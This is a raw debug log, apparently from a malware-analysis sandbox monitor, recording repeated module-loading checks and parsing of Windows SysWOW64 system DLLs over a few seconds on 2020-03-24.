2020-03-24 10:13:25,227 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,227 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,227 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,227 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,227 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,227 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,259 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,259 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,259 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,259 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,259 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,259 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,275 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,305 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,305 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,305 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,305 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,322 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,336 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,352 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,384 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,384 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,400 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,400 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,414 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,414 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,414 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,414 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,414 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,430 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,446 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,446 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,446 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,446 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,446 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,446 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,461 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,461 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,477 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,477 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,477 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,477 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,477 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,477 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,477 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,477 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,477 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,477 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,477 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,493 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,509 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,509 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:25,509 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:25,509 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,523 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,523 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,523 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,523 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,539 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,539 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,539 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,555 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,555 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,555 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,555 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,555 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,555 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,555 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,555 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,555 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,571 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,571 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,571 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,586 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,586 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,586 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,586 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,586 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,601 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,601 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,601 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,618 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,634 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,634 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,634 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,634 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,664 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,664 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,664 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,664 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,664 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,664 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,680 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,680 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,680 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,696 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,696 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,696 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,696 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,696 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,696 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,696 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,711 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,711 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,726 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,726 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,726 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,743 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,743 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,743 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,743 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:25,743 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:25,743 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:25,743 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:25,743 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\lpk.dll
2020-03-24 10:13:25,743 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\lpk.dll
2020-03-24 10:13:25,757 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\usp10.dll
2020-03-24 10:13:25,773 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\usp10.dll
2020-03-24 10:13:25,789 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:13:25,789 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\msvcrt.dll
2020-03-24 10:13:25,789 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\advapi32.dll
2020-03-24 10:13:25,789 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\advapi32.dll
2020-03-24 10:13:25,805 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,805 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,805 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,805 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:25,805 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,805 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,821 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,821 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,835 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,835 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,835 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,851 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,851 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,851 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,851 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,851 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,868 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,868 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,868 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\KernelBase.dll
2020-03-24 10:13:25,868 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,882 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,882 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,882 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,898 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,898 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,898 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,898 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,898 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,898 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,898 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,898 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,914 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ntdll.dll
2020-03-24 10:13:25,914 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sechost.dll
2020-03-24 10:13:25,930 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sechost.dll
2020-03-24 10:13:25,930 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:25,930 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:25,930 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:25,930 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:25,930 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\rpcrt4.dll
2020-03-24 10:13:25,930 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:25,930 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\sspicli.dll
2020-03-24 10:13:25,930 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\cryptbase.dll
2020-03-24 10:13:25,930 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\cryptbase.dll
2020-03-24 10:13:25,930 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ole32.dll
2020-03-24 10:13:25,946 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ole32.dll
2020-03-24 10:13:25,960 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:25,960 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\shlwapi.dll
2020-03-24 10:13:25,960 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:25,960 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:25,960 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:25,960 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:25,960 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:25,960 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:25,960 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:25,960 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:25,960 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:25,976 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:25,976 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:25,976 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:25,976 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:25,976 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:25,976 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:25,976 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:25,976 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:25,992 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\user32.dll
2020-03-24 10:13:25,992 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,007 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,007 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\kernel32.dll
2020-03-24 10:13:26,007 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:26,023 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\gdi32.dll
2020-03-24 10:13:26,585 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\psapi.dll
2020-03-24 10:13:26,585 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\psapi.dll
2020-03-24 10:13:26,601 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\ws2_32.dll
2020-03-24 10:13:26,601 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\ws2_32.dll
2020-03-24 10:13:26,601 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\nsi.dll
2020-03-24 10:13:26,615 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\nsi.dll
2020-03-24 10:13:26,615 [root] DEBUG: Module parsing: \Device\HarddiskVolume2\Windows\SysWOW64\imm32.dll
2020-03-24 10:13:26,615 [root] DEBUG: isModuleLoadedInOwnProcess returned false: \Device\HarddiskVolume2\Windows\SysWOW64\imm32.dll
